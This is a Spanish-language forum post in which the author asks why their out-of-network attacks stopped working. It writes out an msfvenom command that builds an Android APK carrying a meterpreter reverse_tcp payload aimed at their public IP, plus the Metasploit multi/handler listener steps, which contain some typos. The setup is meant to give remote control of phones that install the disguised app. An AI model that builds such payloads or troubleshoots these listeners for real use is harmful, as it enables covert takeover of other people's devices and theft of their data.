Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.
El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera.
msfvenom -p android/meterpreter/reverse_tcp lhost=<mi ip publica> lport=4444 R>/root/Escritorio/aplicacion.apk Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma.
1)
use exploit/multi/hander2)
set payload android/meterpreter/reverse_tcp 3)
set lport=<mi ip local> y también
set lport=4445)
exploitAún configurando la aplicación de esa manera sigue sin funcionar
¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo?
¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local.
Gracias.